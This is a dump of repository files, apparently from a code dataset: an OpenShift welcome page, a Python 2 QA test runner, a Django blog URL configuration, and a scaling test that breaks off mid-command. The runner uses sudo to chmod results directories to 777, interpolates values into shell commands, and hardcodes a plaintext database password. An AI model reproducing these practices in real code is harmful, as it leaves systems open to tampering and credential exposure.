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\n/w+9BQu2G5s85QAAAABJRU5ErkJggg==\">\n <h1>\n Welcome to OpenShift\n </h1>\n <p>\n Place your application here\n </p>\n <p>\n In order to commit to your new project, go to your projects git repo (created with the rhc-create-app command). Make your changes, then run:\n </p>\n <pre>\n git commit -a -m 'Some commit message'\n git push\n </pre>\n <p>\n Then reload this page.\n </p>\n \n <h2>\n What's next?\n </h2>\n <ul>\n <li>\n Why not visit us at <a href=\"http://openshift.redhat.com\">http://openshift.redhat.com</a>, or\n </li>\n <li>\n You could get help in the <a href=\"http://www.redhat.com/openshift\">OpenShift forums</a>, or\n </li>\n <li>\n You're welcome to come chat with us in our IRC channel at #openshift on freenode.net\n </li>\n </ul>\n</body>\n</html>'''\n\n\tstatus = '200 OK'\n\tresponse_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n\t#\n\tstart_response(status, response_headers)\n\treturn [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n\tfrom wsgiref.simple_server import make_server\n\thttpd = make_server('localhost', 8051, application)\n\t# Wait for a single request, serve it and quit.\n\thttpd.handle_request()\n" }, { "alpha_fraction": 0.5236069560050964, "alphanum_fraction": 0.5274817943572998, "avg_line_length": 41.9330940246582, "blob_id": "76babc38c0c36388d21207c5ca48d480ed517046", "content_id": "803e09687c8ea6d1aed5357f2409346b1f440d89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23743, "license_type": "no_license", "max_line_length": 455, "num_lines": 553, "path": "/automation/open/lib/rhtestrunner.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys, os\nimport time\nimport storage\nfrom optparse import OptionParser\nimport database\nimport commands\nimport random\nimport platform\nimport socket \n\n#### homegrown python modules\nimport timelib\nimport tcms_base\n#from tcms_base import *\nimport pscp\nimport aws_console\nimport shutil\nimport tcms\nimport openshift\nimport rhtest\nfrom helper import cmd_get_status_output\n\ndef config_parser():\n \"\"\" parses options and such \"\"\"\n parser = OptionParser()\n parser.set_defaults(VERBOSE=True)\n parser.set_defaults(DEBUG=False)\n parser.set_defaults(RECORD=True)\n parser.set_defaults(GLOBAL_RECORD=True)\n parser.set_defaults(TCMS=False)\n parser.add_option(\"-a\", \"--ami_id\", help=\"ami_id or devenv label as base of instance to be created\")\n parser.add_option(\"-b\", \"--instance_name\", default=None, help=\"new instance's name\")\n parser.add_option(\"-i\", \"--instance_ip\", help=\"dev instance IP\")\n parser.add_option(\"-j\", \"--json_file\", help=\"path to the json formated file that contains the script name\")\n parser.add_option(\"-l\", \"--tag\", help=\"TCMS testcase tags to run\")\n parser.add_option(\"-m\", \"--run_mode\", default='DEV', help=\"PROD|STG|DEV\")\n parser.add_option(\"-n\", \"--notes\", default=None, help=\"User notes about this run\")\n parser.add_option(\"-x\", \"--tcms_run_details\", default=None, help=\"TCMS test run details taken from launcher.py\")\n # useful options for development\n parser.add_option(\"-d\", action=\"store_true\", dest=\"DEBUG\", help=\"enable DEBUG (default true)\")\n parser.add_option('-R', action=\"store_false\", dest=\"RECORD\", help=\"Enable storing to results database\")\n parser.add_option('-G', action=\"store_false\", dest=\"GLOBAL_RECORD\", help=\"Enable storing to global storage (default True)\")\n parser.add_option(\"-T\", action=\"store_true\", dest=\"TCMS\", help=\"Enable storing to TCMS database\")\n parser.add_option(\"-s\", action=\"store_true\", dest=\"START_SERVER\", help=\"start an devenv instance automatically by default\")\n parser.add_option(\"-t\", dest=\"testcase_id\", help=\"Test Case ID\")\n (options, args) = parser.parse_args()\n \n \n print \"*\"*80\n print args\n print \"*\"*80\n return (options, args)\n\n\nclass TestRunner(object):\n def __init__(self, config):\n self._config = config\n self.lasturl = None\n rdb = config.get(\"resultsdirbase\", \"/var/tmp\")\n config.resultsdir = rdb # default when not running a test.\n\n def get_config(self):\n return self._config\n \n def initialize(self):\n runtime_config(self._config)\n self._config.resultsfiles = []\n\n\n def __call__(self, argv):\n \"\"\"\n this function is called whenever an instance object is called.\n ex. tr = TestRunner(cf); \n \"\"\"\n cf = self._config\n self.initialize()\n (options, args) = config_parser()\n cf['options'] = options\n cf['args'] = args\n \n if options.tag:\n cf['tcms_tag'] = options.tag\n\n # XXX perhaps save the arguemnts for future use??\n \n # get the os.envirn variables and save it into cf \n cf.OPENSHIFT_http_proxy = os.getenv('OPENSHIFT_http_proxy')\n cf.OPENSHIFT_user_email = os.getenv('OPENSHIFT_user_email')\n cf.OPENSHIFT_user_passwd = os.getenv('OPENSHIFT_user_passwd')\n cf.argv = args\n cf.arguments = [os.path.basename(argv[0])] + argv[1:]\n return self.run_modules(cf.argv)\n\n def get_module(self, name):\n if sys.modules.has_key(name):\n return sys.modules[name]\n mod = __import__(name)\n\n try:\n mod = __import__(name)\n components = name.split('.')\n for comp in components[1:]:\n mod = getattr(mod, comp)\n except ImportError:\n print >>sys.stderr, \"*** Import error in test module %s \" % (name,)\n return None\n else:\n return mod\n \n def run_module(self, mod):\n \n cf = self._config\n userinterface = storage.get_ui(cf)\n cf['userinterface'] = userinterface\n\n # ui = self._config.userinterface\n user_name = commands.getoutput('whoami')\n cf['user'] = user_name\n output = commands.getoutput(\"groups %s\" % user_name)\n user_group = output.split(':')[0].strip()\n cf.USERGROUP = user_group\n if type(mod) is str:\n mod = self.get_module(mod)\n # find out what type of test this is. if UI, then we need to instantiate\n # a AutoWeb instance\n cf['mod_type'] = mod.__name__.split('.')[0]\n\n if cf.options.tag:\n # user wants to run a collection of test (a testsuite, instantiate \n # a TCMS object, which will be used to add_test()\n cf['tcms_obj'] = tcms_base.TCMS()\n\n if mod:\n cf.reportbasename = mod.__name__.replace(\".\", \"_\")\n cf.logbasename = \"%s.log\" % (cf.reportbasename,)\n cf['logfile'] = storage.get_logfile(cf)\n # merge any test-module specific configuration files\n modconf = os.path.join(os.path.dirname(mod.__file__), \"%s.conf\" % (mod.__name__.split(\".\")[-1],))\n user_modconf = modconf + \".\" + cf.OPENSHIFT_user_email\n if os.path.exists(user_modconf):\n execfile(user_modconf, cf.__dict__)\n elif os.path.exists(modconf):\n execfile(modconf, cf.__dict__)\n\n\n try:\n print \"tcms_testcaserun_id: %s\" %(cf.tcms_testcaserun_id)\n if os.environ.has_key(\"OPENSHIFT_tcms_testcaserun_id\"):\n cf.tcms_testcaserun_id = os.environ['OPENSHIFT_tcms_testcaserun_id']\n except:\n #if rhtest is run manually from command line without launcher, which should put this into the .conf file\n cf.tcms_testcaserun_id = None\n #print \"WARN: None tcms_testcaserun_id info!!!\"\n\n\n if cf.tcms_testcaserun_id != None:\n import tcms\n cf['tcms_obj'] = tcms.TCMS()\n else:\n cf['tcms_obj'] = None\n\n\n starttime = timelib.now()\n cf.results_year_month_dir = os.path.join(cf.resultsdirbase, \"%s\" % (timelib.strftime(\"%Y%m/%d/\")))\n # first make the YYYYMM top directory\n try:\n os.system(\"sudo mkdir -p %s\" % (cf.results_year_month_dir))\n os.system(\"sudo find %s -type d -exec chmod 777 {} \\;\" % (cf.resultsdirbase))\n except OSError, errno:\n if errno[0] == EEXIST:\n pass\n else:\n raise\n\n rand_num = random.randint(0, 5000)\n # now make the actual test directory, added rand_num to make it more unique\n cf.resultsdir = os.path.join(\n cf.results_year_month_dir,\n \"%s-%s-%s\" % (cf.reportbasename, rand_num, timelib.strftime(\"%Y%m%d%H%M%S\", timelib.localtime(starttime)))\n )\n try:\n os.system(\"sudo mkdir -p %s\" % (cf.resultsdir))\n os.system(\"sudo find %s -type d -exec chmod 777 {} \\;\" % (cf.resultsdirbase))\n except OSError, errno:\n if errno[0] == EEXIST:\n pass\n else:\n raise\n\n rpt = storage.get_report(cf)\n cf['report'] = rpt\n cf['logfilename'] = storage.get_logfilename(cf)\n cf.reportfilenames = rpt.filenames # Report file's names. save for future use.\n rpt.initialize()\n rpt.logfile(cf.logfilename)\n rpt.add_title(\"Test Results for module %r.\" % (mod.__name__, ))\n rpt.add_message(\"ARGUMENTS\", \" \".join(cf.arguments))\n # get the build version XXX git of the test itself or the dev\n # number?\n version_file = None #build_version\n self.rpt = rpt # new report object.\n try:\n vf = open(version_file)\n build_info = vf.readlines()[0].strip() # Should be the first line\n rpt.add_message(\"BUILD_INFO\", build_info)\n except:\n #self.info(\"Error: Can't open %s!\" % version_file)\n pass\n # insert the _ID if it exists.\n try: \n rpt.add_message(\"File ID\", mod._ID)\n except:\n rpt.add_message(\"File ID\", 'Missing')\n\n rpt.add_message(\"Platform\", \" \".join(platform.uname()))\n try:\n rpt.add_message(\"Host\", socket.gethostbyname(socket.gethostname()))\n except:\n rpt.add_message(\"Host\", socket.gethostname())\n rpt.add_message(\"RHC client version\", cmd_get_status_output(\"rhc --version\", quiet=True)[1])\n rpt.add_message(\"Python version\", cmd_get_status_output(\"python --version\", quiet=True)[1])\n rpt.add_message(\"Ruby version\", cmd_get_status_output(\"ruby --version\", quiet=True)[1])\n\n\n note = cf.options.notes\n if note:\n rpt.add_message(\"NOTE\", note)\n self._config.comment = note\n else:\n self._config.comment = None\n self.lasturl = url = self._reporturl(rpt)\n self._config['results_url'] = url\n rpt.add_message(\"MODULESTART\", timelib.strftime(\"%a, %d %b %Y %H:%M:%S %Z\", timelib.localtime(starttime)))\n\n suite = mod.get_suite(cf)\n self.test_name = self._config.test_name\n ui = cf.userinterface\n aws = aws_console.AWS_Console()\n ami_info = None\n # get ami, and image label information\n if not cf.options.instance_ip:\n ui.info(\"No instance IP specified, starting new DEV instance...\")\n image_dict = aws.get_all_devenv_images()\n target_image = image_dict[max(sorted(image_dict))]\n image_name = target_image.name.split('/')[1]\n\n ui.info(\"User did not specify an ami or devenv name, using the latest '%s':'%s'\" % (image_name, target_image.id))\n rpt.info(\"User did not specify an ami or devenv name, using the latest '%s':'%s'\" % (image_name, target_image.id))\n if cf.options.instance_name is None:\n import uuid\n cf.options.instance_name = \"QE_%s_%s\" %(image_name, uuid.uuid1().hex[:6])\n \n node =aws.create_node(cf.options.instance_name, target_image, 'm1.medium')\n cf['node'] = node # save it for later reference if need be.\n instance_ip = node.public_ip[0]\n ami_id = node.extra['imageId']\n else:\n instance_ip = cf.options.instance_ip\n \"\"\"\n if (instance_ip == 'localhost') or (instance_ip == '127.0.0.1'):\n ### live CD \n cf['live_cd'] = True\n build_info = 'live_cd'\n ami_id = build_info\n build_version = build_info\n\n else:\n cf['live_cd'] = False\n ui.info(\"Getting ami id for '%s'\" % instance_ip)\n if instance_ip == 'stg.openshift.redhat.com':\n ami_info = database.get_stg_ami()\n ami_id = ami_info.ami_id\n build_version = ami_info.build_version\n else:\n ami_id = aws_console.get_ami(instance_ip)\n \"\"\"\n \"\"\"\n #ami_id = 'ami-1ef82a77'\n ami_info = None\n if ami_info is None:\n try:\n # first query to db to find the build information.\n ami_info = database.get_ami_info(ami_id)\n build_version = ami_info.build_version\n ui.info(\"Found AMI information '%s' matching '%s'\" % (ami_id, build_version))\n except:\n try:\n ui.error(\"Can't find AMI information from mysql database, trying aws console...\")\n image = aws.get_image(ami_id)\n build_version = image.name.split('/')[1]\n except:\n build_version = 'Unknown'\n ui.error(\"Can't find AMI information, putting in '%s'\" % build_version)\n \"\"\"\n ami_id = 'Unknown'\n build_version = 'Unknown'\n instance_info = {}\n instance_info['ami_id'] = ami_id\n try:\n rpt.add_message(\"AMI ID\", aws_console.get_ami(instance_ip))\n except:\n rpt.add_message(\"AMI ID\", ami_id)\n instance_info['build_version'] = build_version\n instance_info['ip'] = instance_ip\n cf['instance_info'] = instance_info\n cf['logger'] = rhtest.RhTestLogger(cf.userinterface, cf.report)\n rest = openshift.Openshift(host=instance_ip,\n user=cf.OPENSHIFT_user_email,\n passwd=cf.OPENSHIFT_user_passwd,\n logger=cf.logger)\n cf['rest_api'] = rest # get a rest handle for the instance\n\n if cf.mod_type == 'UI':\n import autoweb\n cf['web'] = autoweb.AutoWeb(ip=cf.instance_info['ip'], proxy=cf.proxy, config=cf)\n # user sepecified to record result into TCMS\n if cf.options.TCMS:\n if not cf.has_key('tcms_obj'):\n tcms = tcms_base.TCMS()\n cf['tcms_obj'] = tcms\n else:\n if cf.tcms_obj is None:\n cf.tcms_obj = tcms_base.TCMS()\n tcms = cf.tcms_obj \n tcms = cf.tcms_obj\n # get the build id from TCMS\n build_version = cf.instance_info['build_version']\n if cf.options.notes:\n summary = cf.options.notes\n else:\n timestamp = time.strftime(\"%Y_%m_%d-%H:%M:%S\", time.localtime())\n if cf.options.tag:\n run_tag = cf.options.tag\n else:\n run_tag = cf.test_name\n\n summary = \"_\".join([timestamp, run_tag])\n #tcms.check_and_insert_build(cf.instance_info['build_version'])\n #res = tcms.get_testcase_id_by_script_name(mod.__name__)\n tests = suite.get_tests()\n \n if tests[0].inst.__module__ == 'Collections.RunTests':\n # If the module is called Collections.RunTests, then skip it\n # because that is just a \n tests = tests[1:]\n \n testcase_ids, testcases_dict = tcms.get_testcase_ids(tests)\n cf.testcases = testcases_dict # save it for reference later\n # create testcases_variants dictionary\n cf.testcase_variants_map = tcms.get_variants_mapping(testcase_ids) \n #self.info(\"xxx\", 1)\n res = tcms.create_testrun(testcase_ids, build_version, summary)\n #res = tcms.create_testrun_from_script(mod.__name__,\n # build_version)\n # XXX hardcode this during developement \n #res = [{'case': 'demo-1', 'build_id': 1770, 'tested_by_id': None, 'environment_id': 0, 'run': 'TestRun create via XML-RPC', 'run_id': 33116, 'notes': '', 'sortkey': None, 'running_date': None, 'assignee': None, 'build': 'unspecified', 'case_id': 128833, 'is_current': False, 'case_run_status': 'IDLE', 'assignee_id': None, 'case_run_id': 849475, 'tested_by': None, 'case_text_version': 1, 'case_run_status_id': 1, 'close_date': None}]\n cf['testrun_res'] = res\n ui.info(\"TCMS testrun created, case_id: %s, run_id: %s\" % (res[0]['case_run_id'], res[0]['run_id']))\n ui.info(\"Running a total of %s tests\" % (len(testcase_ids)))\n rpt.info(\"TCMS testrun created, case_id: %s, run_id: %s\" % (res[0]['case_run_id'], res[0]['run_id']))\n rpt.info(\"Running a total of %s tests\" % (len(testcase_ids)))\n # get the testcase id from TCMS based on the script name.\n\n rv = suite() # just run instance of the suite\n suite_total_run_time = \"%.2f seconds\" % cf.total_time\n rpt.add_message(\"SUITETIME\", suite_total_run_time)\n rpt.add_message(\"MODULEEND\", timelib.localtimestamp())\n rpt.finalize()\n\n # lastly, run the module-level finalize function.\n if hasattr(mod, \"finalize\") and callable(mod.finalize):\n if cf.options.DEBUG:\n try:\n mod.finalize(cf)\n except:\n ex, val, tb = sys.exc_info()\n import debugger\n debugger.post_mortem(ex, val, tb)\n else:\n mod.finalize(cf)\n if cf.has_key('node'):\n ui.info(\"Terminating node...\")\n aws.stop_node(cf.node.name)\n\n #close browser window\n if cf.mod_type == 'UI':\n try:\n cf['web'].driver.close()\n except:\n pass\n\n # force close of report and logfile between modules\n lfname = cf.logfile.name\n cf.logfile.flush()\n cf.logfile.close()\n del cf.report ; del cf.logfile\n # \n if cf.options.RECORD:\n # scp the log directory to the master central machine\n myscp = pscp.Pscp(host=cf.HOST, user='root')\n src = cf.resultsdir\n dst = os.path.dirname(cf.resultsdir)\n myscp.copy_to(src, dst)\n # the results are then cp over to the mount drive, so now we have two copies of the HTML log\n if cf.options.GLOBAL_RECORD:\n remote_dst = os.path.dirname(cf.global_logs_basepath + src.split('/var/www/html')[1])\n #print '##############'\n #print \"SRC: %s\" % src\n #print \"DST: %s\" % remote_dst\n myscp.copy_to_global_location(src, remote_dst)\n #myscp.copy_to_global_location(src, remote_dst+'/')\n\n else:\n print \"Log files not copied to remote host to save disk space!\"\n\n if (cf.options.DEBUG and cf.options.VERBOSE):\n # now put log file in results dir\n shutil.copy(lfname, cf.resultsdir)\n\n\n # tell user where to look for files\n ui = cf.userinterface\n if cf.options.RECORD:\n ui.Print(\"Results location: %s\" % (url,))\n if cf.options.GLOBAL_RECORD:\n global_results_url = cf.global_logs_baseurl + src.split('/var/www/html')[1]\n ui.Print(\"Results location: %s\" % (global_results_url,))\n else:\n ui.Print(\"Results location: %s\" % (cf.resultsdir))\n\n #if (cf.options.TCMS):\n #self.update_loglink(cf.resultsdir, cf.options.testcase_id) #always do update\n\n # Adding comments to TCMS in the end of testing\n if cf.tcms_testcaserun_id != None:\n if cf.options.RECORD:\n if cf.options.GLOBAL_RECORD:\n comments = global_results_url\n else:\n comments = url\n try:\n cf['tcms_obj'].update_testcaserun_comments(cf.tcms_testcaserun_id, comments)\n cf['tcms_obj'].update_testcaserun_testlog(cf.tcms_testcaserun_id, \"Logs\", comments)\n except Exception as e:\n print \"ERROR: Unable to update comments: %s\"%str(e)\n else:\n print \"No log file is saved\"\n\n \"\"\"\n if cf.flags.has_key('EMAIL'):\n # email the results back to whomever started the test.\n if cf.get('cc'):\n recipients = cf.cc.split(\",\")\n else:\n recipients = None\n print \"cc: %s \" % recipients\n e_rpt = reports.Email.EmailReport(\"text/plain\", recipients)\n e_rpt.initialize()\n e_rpt.add_title(\"Test result notification\")\n e_rpt.info(url)\n e_rpt.finalize()\n else:\n print (\"Results not emailed out\") \n \"\"\"\n return rv\n\n def update_loglink(self, loglink, testcase_id):\n ### HARDCODED - THIS IS TEMPORARY - \n loglink = '/'.join([\"http://10.14.16.138\", loglink.split(\"/var/www/html/\")[1]])\n case_run_id = self._config.tcms_testcaserun_id\n if case_run_id is None:\n print \"ERROR: Missing tcms_testrun_id for updating testcaserun\"\n return\n try:\n #if os.getenv('OPENSHIFT_variant_testcase') == \"True\":\n # loglink = os.environ['OPENSHIFT_test_name'] + \"-: \" + loglink\n tcms_object = tcms.TCMS()\n #testrun_id = os.environ['OPENSHIFT_tcms_testrun_id']\n #testcaserun = tcms_object.get_testcaserun(testcase_id, testrun_id)\n #testcaserun = os.environ['OPENSHIFT_tcms_testcaserun_id']]\n \n #old_loglinks = testcaserun['notes']\n #if old_loglinks:\n # loglink += \" %s\" % old_loglinks\n tcms_object.update_testcaserun(case_run_id, {'notes':loglink})\n except Exception as e:\n print \"ERROR: Failed to update log link for test case run:%s\"%(str(e))\n\n def _reporturl(self, rpt):\n cf = self._config\n baseurl = cf.get(\"baseurl\")\n documentroot = cf.get(\"documentroot\")\n resultsdir = cf.resultsdir\n if baseurl and documentroot:\n url = baseurl+resultsdir[len(documentroot):]\n rpt.add_url(\"TESTRESULTS\", url)\n return url\n else:\n rpt.add_message(\"RESULTSDIR\", resultsdir)\n return resultsdir\n\n\n def run_modules(self, modlist):\n \"\"\"run_modules(modlist)\n Runs the run_module() function on the supplied list of modules (or module\n names). \n \"\"\"\n self._config['modlist'] = modlist\n rv =0\n for mod in modlist:\n rv += self.run_module(mod)\n # give things time to \"settle\" from previous suite. Some spawned\n # processes may delay exiting and hold open TCP ports, etc.\n time.sleep(2) \n return rv\n \ndef runtime_config(cf):\n \"\"\"\n connects to the database based on cf.DBURI, if the option --dburi is given\n then try to connect to the database specified by that command line option.\n Otherwise, use the default setting, which is 'localhost'\n \n \"\"\"\n if 'DBURI' in os.environ.keys():\n cf.DBURI = os.environ['DBURI']\n hostname = cf.get('DBURI')\n ##### \n if hostname is not None:\n dburi = 'mysql://ruser:lab@%s/%s' % (hostname, cf.TESTRESULTS_DBURI)\n cf.DBURI = dburi\n database.connect2db(cf.DBURI)\n\n\ndef get_testrunner(argv=None):\n global __testrunner\n #if __testrunner:\n __testrunner = TestRunner(argv or sys.argv)\n return __testrunner\n\ndef delete_testrunner():\n global __testrunner\n __testrunner = None\n\ndef runtest(argv):\n cf = storage.get_config()\n tr = TestRunner(cf)\n return tr(argv)\n\n\nif __name__ == '__main__':\n runtest(sys.argv)\n\n" }, { "alpha_fraction": 0.5849999785423279, "alphanum_fraction": 0.5862500071525574, "avg_line_length": 41.105262756347656, "blob_id": "278dfa958065a3a3c15687bfe32b4de368c3def9", "content_id": "6e10e62c0ad7493909c96b3a258ede9fb1346536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 800, "license_type": "no_license", "max_line_length": 73, "num_lines": 19, "path": "/sblog/simpleblog/urls.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: utf-8-*-\n\nfrom django.conf.urls import patterns, url\n\n\nurlpatterns = patterns(('simpleblog.views'),\n url(r'^bloglist/$', 'blog_list', name='bloglist'),\n url(r'^blog/(?P<id>\\d+)/$', 'blog_show', name='detailblog'),\n url(r'^blog/tag/(?P<id>\\d+)/$', 'blog_filter', name='filtrblog'),\n url(r'^blog/search/$', 'blog_search', name='searchblog'),\n url(r'^blog/add/$', 'blog_add', name='addblog'),\n url(r'^blog/addmassage/$', 'add_weibo', name='addmassage'),\n url(r'^blog/showweibo/$', 'show_weibo', name='showweibo'),\n url(r'^blog/(?P<id>\\w+)/update/$', 'blog_update', name='updateblog'),\n url(r'^blog/(?P<id>\\w+)/del/$', 'blog_del', name='delblog'),\n url(r'^blog/(?P<id>\\d+)/commentshow/$', 'blog_show_comment', \n name='showcomment'),\n)\n" }, { "alpha_fraction": 0.4577777683734894, "alphanum_fraction": 0.4646635353565216, "avg_line_length": 49.71428680419922, "blob_id": "66ad5470fb2da147e9eb6ced2a3ea982629aa570", "content_id": "4229075db26791818d3d9176e3ca1f6b92ea8735", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15975, "license_type": "no_license", "max_line_length": 152, "num_lines": 315, "path": "/automation/open/testmodules/RT/scaling/scalable_app_after_altering_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-26\n\n[US2003,US2004,US2005,US2006,US2007,US2099][Runtime][cartridge]Scalable app after altering domain name\nhttps://tcms.engineering.redhat.com/case/147642/\n\"\"\"\nimport os\nimport re\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n self.summary = \"[US2003,US2004,US2005,US2006,US2007,US2099][Runtime][cartridge]Scalable app after altering domain name\"\n self.app_name = common.getRandomString(8)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = self.app_name\n self.record_count = 30 # amount of records to be inserted\n self.domain_name = common.get_domain_name()\n self.new_domain_name = common.getRandomString(10)\n common.env_setup()\n\n def finalize(self):\n try:\n common.alter_domain(self.domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n except:\n pass\n\n\nclass ScalingAfterAlterDomain(OpenShiftTest):\n\n def test_method(self):\n self.step(\"Create scalable %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", True)\n self.assert_equal(ret, 0, \"Failed to create scalable %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Embed mysql to the app\")\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to the app\")\n\n self.step(\"Copy sample app to git repo and git push\")\n self.mysql_user = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"username\"]\n self.mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"password\"]\n self.mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"database\"]\n self.mysql_host = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"url\"]\n self.mysql_port = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"port\"]\n if self.test_variant in ('php'):\n cmd = (\"cd '%s/php/' \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/mysql.php' . \"\n \" && sed -i -e 's/#host/%s/g' mysql.php && sed -i -e 's/#port/%s/g' mysql.php \"\n \" && sed -i -e 's/#dbname/%s/g' mysql.php \"\n \" && sed -i -e 's/#user/%s/g' mysql.php \"\n \" && sed -i -e 's/#passwd/%s/g' mysql.php \"\n \" && git add . && git commit -amt \"\n \" && git push\") % (self.git_repo, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n elif self.test_variant in ('jbossas', 'jbosseap', 'jbossews'):\n cmd = (\"cd '%s/src/main/webapp/' \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/mysql.jsp' . \"\n \" && mkdir WEB-INF/lib \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar' WEB-INF/lib \"\n \" && sed -i -e 's/#host/%s/g' mysql.jsp \"\n \" && sed -i -e 's/#port/%s/g' mysql.jsp 